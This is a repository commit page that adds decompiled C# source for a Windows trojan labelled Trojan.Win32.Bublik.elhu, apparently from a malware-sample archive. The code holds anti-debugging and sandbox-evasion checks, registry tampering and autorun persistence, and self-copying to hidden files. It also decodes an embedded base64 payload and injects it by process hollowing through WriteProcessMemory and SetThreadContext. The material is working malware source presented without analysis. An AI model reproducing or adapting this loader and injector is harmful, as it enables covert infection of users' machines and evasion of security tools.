daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-17 00:09:23 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/AssemblyInfo.cs
+5
View File
@@ -0,0 +1,5 @@
using System.Reflection;
using System.Runtime.CompilerServices;
[assembly: SuppressIldasm]
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/Trojan.Win32.Bublik.elhu.csproj
+48
View File
@@ -0,0 +1,48 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BC59CD54-9FCB-4971-9624-E42E6033A01C}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>server2</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_0002.cs" />
<Compile Include="_0003.cs" />
<Compile Include="_0005.cs" />
<Compile Include="_0006.cs" />
<Compile Include="_0008.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="  " />
<EmbeddedResource Include="file" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/Trojan.Win32.Bublik.elhu.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "server2", "Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.csproj", "{BC59CD54-9FCB-4971-9624-E42E6033A01C}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BC59CD54-9FCB-4971-9624-E42E6033A01C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BC59CD54-9FCB-4971-9624-E42E6033A01C}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BC59CD54-9FCB-4971-9624-E42E6033A01C}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BC59CD54-9FCB-4971-9624-E42E6033A01C}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/_0002.cs
+457
View File
@@ -0,0 +1,457 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Windows.Forms;
internal sealed class \u0002
{
private static \u0003 \u0002 = new \u0003();
private static string \u0003 = \u0008.\u0002(-626735724);
private static string \u0005 = \u0008.\u0002(-626735724);
private static byte[] \u0008 = new byte[7]
{
(byte) 98,
(byte) 87,
(byte) 76,
(byte) 65,
(byte) 54,
(byte) 43,
(byte) 32
};
private static byte[] \u0006;
private static bool \u000E = true;
private static bool \u000F = true;
private static bool \u0002\u2000 = true;
private static bool \u0003\u2000 = true;
private static bool \u0005\u2000 = true;
private static bool \u0008\u2000 = true;
private static bool \u0006\u2000 = true;
private static bool \u000E\u2000 = true;
private static bool \u000F\u2000 = true;
private static bool \u0002\u2001 = true;
private static bool \u0003\u2001 = true;
private static bool \u0005\u2001 = true;
private static bool \u0008\u2001 = true;
private static bool \u0006\u2001 = true;
private static bool \u000E\u2001 = true;
private static bool \u000F\u2001 = false;
private static string \u0002\u2002 = \u0008.\u0002(-626735683);
private static string \u0003\u2002 = \u0008.\u0002(-626735663);
private static bool \u0005\u2002 = false;
private static bool \u0008\u2002 = false;
private static bool \u0006\u2002 = false;
private static bool \u000E\u2002 = false;
private static bool \u000F\u2002 = false;
private static bool \u0002\u2003 = true;
private static string \u0003\u2003 = \u0008.\u0002(-626735669);
private static bool \u0005\u2003 = true;
private static bool \u0008\u2003 = false;
private static int \u0006\u2003 = 0;
private static ThreadStart \u000E\u2003;
private static bool \u0002(string _param0) => Process.GetProcessesByName(_param0).Length > 0;
private static void \u0002(string _param0, string _param1)
{
int num = (int) MessageBox.Show(_param0, _param1, MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
private static void \u0002() => Console.Write(\u0008.\u0002(-626735471));
private static void \u0002(string[] _param0)
{
if (!(\u0002.\u0003 == \u0002.\u0005))
return;
\u0002.\u0002();
if (\u0002.\u000F\u2001)
{
try
{
if (\u0002.\u000E\u2003 == null)
\u0002.\u000E\u2003 = new ThreadStart(\u0002.\u0005);
new Thread(\u0002.\u000E\u2003).Start();
}
catch
{
}
}
\u0002.\u0002();
if (\u0002.\u000E)
{
try
{
if (Debugger.IsAttached)
return;
}
catch
{
}
}
if (\u0002.\u000F)
{
try
{
long ticks = DateTime.Now.Ticks;
Thread.Sleep(10);
if (DateTime.Now.Ticks - ticks < 10L)
return;
}
catch
{
}
}
if (\u0002.\u0002\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735482)))
return;
}
catch
{
}
}
if (\u0002.\u0003\u2000)
{
try
{
Form form = new Form();
form.Text = \u0008.\u0002(-626735436);
form.Opacity = 0.0;
form.ShowInTaskbar = false;
form.Show();
if (form.Text == \u0008.\u0002(-626735431))
return;
form.Close();
}
catch
{
}
}
if (\u0002.\u0005\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735446)))
return;
}
catch
{
}
}
if (\u0002.\u0008\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735400)))
return;
}
catch
{
}
}
if (\u0002.\u0006\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735410)))
return;
}
catch
{
}
}
if (\u0002.\u000E\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735363)))
return;
}
catch
{
}
}
if (\u0002.\u000F\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735386)))
return;
}
catch
{
}
}
if (\u0002.\u0002\u2001)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-626735595)))
return;
}
catch
{
}
}
\u0002.\u0002();
if (\u0002.\u0008\u2003)
{
try
{
Thread.Sleep(\u0002.\u0006\u2003 * 1000);
}
catch
{
}
}
\u0002.\u0002();
try
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\u0008.\u0002(-626735589));
\u0002.\u0002();
StreamReader streamReader = new StreamReader(manifestResourceStream);
string end = streamReader.ReadToEnd();
\u0002.\u0002();
streamReader.Close();
\u0002.\u0006 = Convert.FromBase64String(end);
try
{
\u0002.\u0002();
Thread thread = new Thread(new ThreadStart(\u0002.\u0003));
\u0002.\u0002();
thread.Start();
\u0002.\u0002();
}
catch
{
}
}
catch
{
}
\u0002.\u0002();
if (\u0002.\u0005\u2002)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735604), true).SetValue(\u0008.\u0002(-626735538), (object) \u0008.\u0002(-626735514), RegistryValueKind.DWord);
}
catch
{
}
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735506));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735186), (object) \u0008.\u0002(-626735514), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735186), (object) \u0008.\u0002(-626735514), RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735186), (object) \u0008.\u0002(-626735514), RegistryValueKind.DWord);
}
catch
{
}
if (\u0002.\u0008\u2002)
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735138)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735138));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735138), true).SetValue(\u0008.\u0002(-626735127), (object) \u0008.\u0002(-626735336), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735138), true).SetValue(\u0008.\u0002(-626735127), (object) \u0008.\u0002(-626735336), RegistryValueKind.DWord);
}
if (\u0002.\u0006\u2002)
{
try
{
new Process()
{
StartInfo = {
FileName = \u0008.\u0002(-626735360),
Arguments = \u0008.\u0002(-626735308),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
if (\u0002.\u000E\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735506));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735291), (object) \u0008.\u0002(-626735234), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735291), (object) \u0008.\u0002(-626735234), RegistryValueKind.DWord);
}
catch
{
}
}
if (\u0002.\u000F\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735506));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735258), (object) \u0008.\u0002(-626735234), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735506), true).SetValue(\u0008.\u0002(-626735258), (object) \u0008.\u0002(-626735234), RegistryValueKind.DWord);
}
catch
{
}
}
}
\u0002.\u0002();
if (\u0002.\u0002\u2003)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735604), true).SetValue(\u0008.\u0002(-626735971), (object) \u0008.\u0002(-626735336), RegistryValueKind.DWord);
}
catch
{
}
try
{
FileStream fileStream1 = new FileStream(Process.GetCurrentProcess().MainModule.FileName, FileMode.Open, FileAccess.Read);
byte[] buffer = new byte[fileStream1.Length];
fileStream1.Read(buffer, 0, buffer.Length);
fileStream1.Close();
FileStream fileStream2 = new FileStream(Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003, FileMode.Create);
fileStream2.Write(buffer, 0, buffer.Length);
fileStream2.Close();
fileStream2.Dispose();
FileStream fileStream3 = new FileStream(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003, FileMode.Create);
fileStream3.Write(buffer, 0, buffer.Length);
fileStream3.Close();
fileStream3.Dispose();
File.SetAttributes(Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003, FileAttributes.Hidden);
File.SetAttributes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003, FileAttributes.Hidden);
}
catch
{
}
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735939), true).SetValue(\u0008.\u0002(-626735927), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003));
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-626735939), true).SetValue(\u0008.\u0002(-626735927), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003));
}
catch
{
}
if (\u0002.\u0005\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735897)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-626735897));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735897), true).SetValue(\u0008.\u0002(-626735927), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003));
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-626735897), true).SetValue(\u0008.\u0002(-626735927), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-626735947) + \u0002.\u0003\u2003));
}
catch
{
}
}
}
\u0002.\u0002();
if (!\u0002.\u0005\u2003)
return;
try
{
if (Application.ExecutablePath.Contains(Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000))))
return;
string str = \u0008.\u0002(-626736083) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u0008.\u0002(-626736034) + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u0008.\u0002(-626736055);
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626736006));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u0008.\u0002(-626736000)) + \u0008.\u0002(-626736006)),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
public static void \u0003()
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[1]
{
(object) new string[0]
});
}
catch
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[0]);
}
catch
{
try
{
\u0002.\u0002();
MethodInfo entryPoint = Assembly.Load(\u0002.\u0006).EntryPoint;
\u0002.\u0002();
entryPoint.Invoke((object) null, (object[]) null);
}
catch
{
try
{
\u0002.\u0002();
\u0002.\u0002.\u0002(\u0002.\u0006, string.Empty, Application.ExecutablePath);
\u0002.\u0002();
}
catch
{
}
}
}
}
}
private static void \u0005() => \u0002.\u0002(\u0002.\u0002\u2002, \u0002.\u0003\u2002);
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/_0003.cs
+310
View File
@@ -0,0 +1,310 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
using System;
using System.Runtime.InteropServices;
internal sealed class \u0003
{
private void \u0002() => Console.Write(\u0008.\u0002(-626735471));
[DllImport("kernel32")]
private static extern IntPtr GetProcAddress(IntPtr _param0, string _param1);
[DllImport("kernel32")]
private static extern IntPtr LoadLibrary(string _param0);
public void \u0002(byte[] _param1, string _param2, string _param3)
{
\u0003.\u0002\u2001 obj1 = new \u0003.\u0002\u2001();
\u0003.\u0006\u2001 obj2 = new \u0003.\u0006\u2001();
this.\u0002();
\u0003.\u0002\u2002 structure1 = new \u0003.\u0002\u2002();
\u0003.\u0006\u2000 structure2 = new \u0003.\u0006\u2000();
this.\u0002();
\u0003.\u000E\u2000 obj3 = new \u0003.\u000E\u2000();
\u0003.\u000F\u2001 obj4 = new \u0003.\u000F\u2001();
this.\u0002();
structure2.\u0002 = (uint) Marshal.SizeOf((object) structure2);
obj4.\u0002 = 65543U;
this.\u0002();
GCHandle gcHandle = GCHandle.Alloc((object) _param1, GCHandleType.Pinned);
int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
this.\u0002();
gcHandle.Free();
\u0003.\u0002\u2001 structure3 = (\u0003.\u0002\u2001) Marshal.PtrToStructure((IntPtr) int32, typeof (\u0003.\u0002\u2001));
this.\u0002();
\u0003.\u0006\u2001 structure4 = (\u0003.\u0006\u2001) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0006\u2001), typeof (\u0003.\u0006\u2001));
this.\u0002();
if (structure4.\u0002 != 17744U || structure3.\u0002 != (ushort) 23117)
return;
\u0003.\u0002 forFunctionPointer1 = (\u0003.\u0002) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735843)), typeof (\u0003.\u0002));
\u0003.\u0005 forFunctionPointer2 = (\u0003.\u0005) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735864)), \u0008.\u0002(-626735816)), typeof (\u0003.\u0005));
\u0003.\u0008 forFunctionPointer3 = (\u0003.\u0008) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735779)), typeof (\u0003.\u0008));
this.\u0002();
\u0003.\u0003 forFunctionPointer4 = (\u0003.\u0003) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735800)), typeof (\u0003.\u0003));
\u0003.\u0006 forFunctionPointer5 = (\u0003.\u0006) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735773)), typeof (\u0003.\u0006));
\u0003.\u000E forFunctionPointer6 = (\u0003.\u000E) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626736488)), typeof (\u0003.\u000E));
this.\u0002();
\u0003.\u000F forFunctionPointer7 = (\u0003.\u000F) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626736463)), typeof (\u0003.\u000F));
this.\u0002();
int num1 = forFunctionPointer1(_param3, _param2, IntPtr.Zero, IntPtr.Zero, false, (\u0003.\u0002\u2000) 4, IntPtr.Zero, (string) null, ref structure2, out obj3) ? 1 : 0;
int num2 = forFunctionPointer2(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000) ? 1 : 0;
this.\u0002();
if (!forFunctionPointer3(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000, structure4.\u0005.\u000E\u2001, (\u0003.\u0008\u2000) 12288, (\u0003.\u0005\u2000) 64))
return;
int num3 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000, _param1, structure4.\u0005.\u000F\u2001, (object) null) ? 1 : 0;
this.\u0002();
for (int index1 = 0; index1 <= (int) structure4.\u0003.\u0003 - 1; ++index1)
{
structure1 = (\u0003.\u0002\u2002) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0006\u2001 + Marshal.SizeOf((object) structure4) + Marshal.SizeOf((object) structure1) * index1), typeof (\u0003.\u0002\u2002));
byte[] numArray = new byte[(IntPtr) structure1.\u0008];
for (int index2 = 0; index2 <= (int) structure1.\u0008 - 1; ++index2)
numArray[index2] = _param1[(long) structure1.\u0006 + (long) index2];
this.\u0002();
int num4 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) (structure4.\u0005.\u0005\u2000 + structure1.\u0005), numArray, structure1.\u0008, (object) null) ? 1 : 0;
}
int num5 = forFunctionPointer5(obj3.\u0003, ref obj4) ? 1 : 0;
this.\u0002();
byte[] bytes = BitConverter.GetBytes(structure4.\u0005.\u0005\u2000);
int num6 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) (obj4.\u0002\u2001 + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
obj4.\u0008\u2001 = structure4.\u0005.\u0005\u2000 + structure4.\u0005.\u000F;
this.\u0002();
int num7 = forFunctionPointer6(obj3.\u0003, ref obj4) ? 1 : 0;
int num8 = (int) forFunctionPointer7(obj3.\u0003);
}
private delegate bool \u0002(
string _param1,
string _param2,
IntPtr _param3,
IntPtr _param4,
bool _param5,
\u0003.\u0002\u2000 _param6,
IntPtr _param7,
string _param8,
ref \u0003.\u0006\u2000 _param9,
out \u0003.\u000E\u2000 _param10);
private delegate bool \u0003(
IntPtr _param1,
IntPtr _param2,
byte[] _param3,
uint _param4,
object _param5);
private delegate bool \u0005(IntPtr _param1, IntPtr _param2);
private delegate bool \u0006(IntPtr _param1, ref \u0003.\u000F\u2001 _param2);
private delegate bool \u0008(
IntPtr _param1,
IntPtr _param2,
uint _param3,
\u0003.\u0008\u2000 _param4,
\u0003.\u0005\u2000 _param5);
private delegate bool \u000E(IntPtr _param1, [In] ref \u0003.\u000F\u2001 _param2);
private delegate uint \u000F(IntPtr _param1);
private enum \u0002\u2000 : uint
{
}
private struct \u0002\u2002
{
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public byte[] \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public ushort \u0002\u2000;
public ushort \u0003\u2000;
public uint \u0005\u2000;
}
private enum \u0003\u2000 : uint
{
}
private enum \u0005\u2000 : uint
{
}
private struct \u0006\u2000
{
public uint \u0002;
public string \u0003;
public string \u0005;
public string \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public uint \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public short \u000E\u2000;
public short \u000F\u2000;
public IntPtr \u0002\u2001;
public IntPtr \u0003\u2001;
public IntPtr \u0005\u2001;
public IntPtr \u0008\u2001;
}
private enum \u0008\u2000 : uint
{
}
private struct \u000E\u2000
{
public IntPtr \u0002;
public IntPtr \u0003;
public uint \u0005;
public uint \u0008;
}
private struct \u000F\u2000
{
public int \u0002;
public IntPtr \u0003;
public bool \u0005;
}
private struct \u0002\u2001
{
public ushort \u0002;
public ushort \u0003;
public ushort \u0005;
public ushort \u0008;
public ushort \u0006;
public ushort \u000E;
public ushort \u000F;
public ushort \u0002\u2000;
public ushort \u0003\u2000;
public ushort \u0005\u2000;
public ushort \u0008\u2000;
public ushort \u0006\u2000;
public ushort \u000E\u2000;
public ushort \u000F\u2000;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] \u0002\u2001;
public ushort \u0003\u2001;
public ushort \u0005\u2001;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] \u0008\u2001;
public int \u0006\u2001;
}
private struct \u0003\u2001
{
public ushort \u0002;
public ushort \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public ushort \u000E;
public ushort \u000F;
}
private struct \u0005\u2001
{
public uint \u0002;
public uint \u0003;
}
private struct \u0006\u2001
{
public uint \u0002;
public \u0003.\u0003\u2001 \u0003;
public \u0003.\u0008\u2001 \u0005;
}
private struct \u0008\u2001
{
public ushort \u0002;
public byte \u0003;
public byte \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public uint \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public ushort \u000E\u2000;
public ushort \u000F\u2000;
public ushort \u0002\u2001;
public ushort \u0003\u2001;
public ushort \u0005\u2001;
public ushort \u0008\u2001;
public uint \u0006\u2001;
public uint \u000E\u2001;
public uint \u000F\u2001;
public uint \u0002\u2002;
public ushort \u0003\u2002;
public ushort \u0005\u2002;
public uint \u0008\u2002;
public uint \u0006\u2002;
public uint \u000E\u2002;
public uint \u000F\u2002;
public uint \u0002\u2003;
public uint \u0003\u2003;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public \u0003.\u0005\u2001[] \u0005\u2003;
}
private struct \u000E\u2001
{
public uint \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] \u0002\u2000;
public uint \u0003\u2000;
}
private struct \u000F\u2001
{
public uint \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public \u0003.\u000E\u2001 \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public uint \u000E\u2000;
public uint \u000F\u2000;
public uint \u0002\u2001;
public uint \u0003\u2001;
public uint \u0005\u2001;
public uint \u0008\u2001;
public uint \u0006\u2001;
public uint \u000E\u2001;
public uint \u000F\u2001;
public uint \u0002\u2002;
public uint \u0003\u2002;
public uint \u0005\u2002;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] \u0008\u2002;
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/_0005.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
using System.Runtime.InteropServices;
internal sealed class \u0005
{
internal static \u0005.\u0002 \u0002;
[StructLayout(LayoutKind.Explicit, Size = 7, Pack = 1)]
private struct \u0002
{
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/_0006.cs
+31
View File
@@ -0,0 +1,31 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
internal static class \u0006
{
public static byte[] \u0002(byte[] _param0, byte[] _param1)
{
byte num1 = _param0[1];
int length = _param1.Length;
byte num2 = (byte) (length + 11 ^ (int) num1 + 7);
uint num3 = (uint) (((int) _param0[0] | (int) _param0[2] << 8) + ((int) num2 << 3));
ushort num4 = 0;
for (int index = 0; index < length; ++index)
{
if ((index & 1) == 0)
{
num3 = (uint) ((int) num3 * 214013 + 2531011);
num4 = (ushort) (num3 >> 16);
}
byte num5 = (byte) num4;
num4 >>= 8;
byte num6 = _param1[index];
_param1[index] = (byte) ((uint) ((int) num6 ^ (int) num1 ^ (int) num2 + 3) ^ (uint) num5);
num2 = num6;
}
return _param1;
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/_0008.cs
+101
View File
